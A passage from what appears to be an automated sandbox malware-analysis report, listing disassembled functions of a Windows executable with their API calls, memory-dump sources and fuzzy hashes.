                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99813671E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB291C7785986DF45
                                                                                                                                                                                                                                  Function 0040694B Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 482a787b1e93187f303b5cf3d5fad6fe7b39919471561c5747e88453b07a974d
                                                                                                                                                                                                                                  • Instruction ID: 102eaf4500afa36507883bc49c2e43cf6988b9622fad8f3b05d2dee193d28093
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 482a787b1e93187f303b5cf3d5fad6fe7b39919471561c5747e88453b07a974d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59814631E04228DBEB24CFA8C8447ADBBB1FB45305F24816AD856BB2C1D7786986DF45
                                                                                                                                                                                                                                  Function 00406D99 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9f1c290fb996461610dc05284254ea561df87b77a02dec37c2f17ec044b843f5
                                                                                                                                                                                                                                  • Instruction ID: a08c2ff1229a9d9811f570562685937cd52cd07e2c0e62d18be643d670bbfbbc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f1c290fb996461610dc05284254ea561df87b77a02dec37c2f17ec044b843f5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2712471E04228CFDF24CFA8C894BADBBB1FB45305F14806AD846BB281D7386996DF45
                                                                                                                                                                                                                                  Function 00406EB7 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 94b25f7611fe17d8713c058a6f17e47c27a0001acd6cd4792c255928ec9836d2
                                                                                                                                                                                                                                  • Instruction ID: 79a44bce1fc769ef2bff189c36481e04bceb851a7a33cd9c662bfef797063258
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94b25f7611fe17d8713c058a6f17e47c27a0001acd6cd4792c255928ec9836d2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16713571E04218CFDF28CFA8C854BADBBB1FB45305F14806AD856BB281C7786996DF45
                                                                                                                                                                                                                                  Function 00406E03 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 0815afd74f654c503a0d6cbf149fd97df88f382804d918d52621f4cf167551eb
                                                                                                                                                                                                                                  • Instruction ID: e69ca442741bc9d68f02c0d51ce09155c0cc214200520a71f8620544c8c92ec3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0815afd74f654c503a0d6cbf149fd97df88f382804d918d52621f4cf167551eb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78713731E04229CFEF24CF98C854BADBBB1FB45305F14806AD856BB281C7786996DF45
                                                                                                                                                                                                                                  Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GlobalFree.KERNELBASE(0077AD68), ref: 00401C0B
                                                                                                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Global$AllocFree
                                                                                                                                                                                                                                  • String ID: open
                                                                                                                                                                                                                                  • API String ID: 3394109436-2758837156
                                                                                                                                                                                                                                  • Opcode ID: 8aa349daceb3bfa3e4c59c81c2926e7320354a40456f95440d029982943f30c3
                                                                                                                                                                                                                                  • Instruction ID: 8eac660807c21ed12e13958da8917723c714091cd548f80009266c163e09adae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aa349daceb3bfa3e4c59c81c2926e7320354a40456f95440d029982943f30c3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88219673604114DBD720AF94DDC4A5E73B4AB14324725453BF952F72D1C6BCAC418BAD
                                                                                                                                                                                                                                  Function 00401F12 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00405A07: ShellExecuteExW.SHELL32(?), ref: 00405A16
                                                                                                                                                                                                                                    • Part of subcall function 0040687B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040688C
                                                                                                                                                                                                                                    • Part of subcall function 0040687B: GetExitCodeProcess.KERNELBASE(?,?), ref: 004068AE
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • @, xrefs: 00401F8A
                                                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401F6A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
                                                                                                                                                                                                                                  • String ID: @$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                                                                                                                                                                                                  • API String ID: 165873841-3372431936
                                                                                                                                                                                                                                  • Opcode ID: ec455502b63788f10edc8ab64c154264d8a268f65a71d0e3b4a8938664c1ec49
                                                                                                                                                                                                                                  • Instruction ID: 854b83587bfa871489f156109ad6bc95ad0bdfdde4298cee34a1320aee810ded
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec455502b63788f10edc8ab64c154264d8a268f65a71d0e3b4a8938664c1ec49
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51115871A002188ACB10EFB9CA49B8DB7F0AF18304F20857AE455F72D1DBBC89409F18
                                                                                                                                                                                                                                  Function 0040687B Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064), ref: 0040688C
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 004068A1
                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNELBASE(?,?), ref: 004068AE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ObjectSingleWait$CodeExitProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2567322000-0
                                                                                                                                                                                                                                  • Opcode ID: 43b4355e24816a7ad7f968a018a337995dd09ca4016bdbbfd5a9f17726beb16e
                                                                                                                                                                                                                                  • Instruction ID: 449920ab3f72c3dfc95b6517ca2509daec1a1628d624f4887b74fb8a1e473b91
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43b4355e24816a7ad7f968a018a337995dd09ca4016bdbbfd5a9f17726beb16e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CE0D832600508FBEB01AF54ED05E9E7F6EDB44700F114133FA01B6190C7B69E21DBA4
                                                                                                                                                                                                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                                  • Opcode ID: 63a2f56983bf68ef82dee2aa6a19202fa350abc755d43e3a7d8789ab9979b1a1
                                                                                                                                                                                                                                  • Instruction ID: 7386925216f0ba2205b30ed829fcd6135741b8aa1a9a6a78a8dcdd66e79b8f9a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63a2f56983bf68ef82dee2aa6a19202fa350abc755d43e3a7d8789ab9979b1a1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1001F431724220EBEB194B389D09B2A3698E710318F10867FF855F66F1E678CC169B5D
                                                                                                                                                                                                                                  Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744596063.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Og1SeeXcB2.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$EnableShow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1136574915-0
                                                                                                                                                                                                                                  • Opcode ID: 995dee1ed0aaffd2cc9e8c77cbe2690bddec1daede21b786ffd1d24fa7dfd3a3
                                                                                                                                                                                                                                  • Instruction ID: 0770d74e77a1de07b8bd233185459685766243133281c20ed0e2d1775c5ce133
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 995dee1ed0aaffd2cc9e8c77cbe2690bddec1daede21b786ffd1d24fa7dfd3a3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96E09A32A04200DFD704EFA4AE484AEB3B4FF90325B20097FE401F21D1CBB95C00862E
                                                                                                                                                                                                                                  Function 004067D0 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
                                                                                                                                                                                                                                    • Part of subcall function 00406760: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406777
                                                                                                                                                                                                                                    • Part of subcall function 00406760: wsprintfW.USER32 ref: 004067B2
                                                                                                                                                                                                                                    • Part of subcall function 00406760: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067C6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1744446943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744306839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744463370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1744480181.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
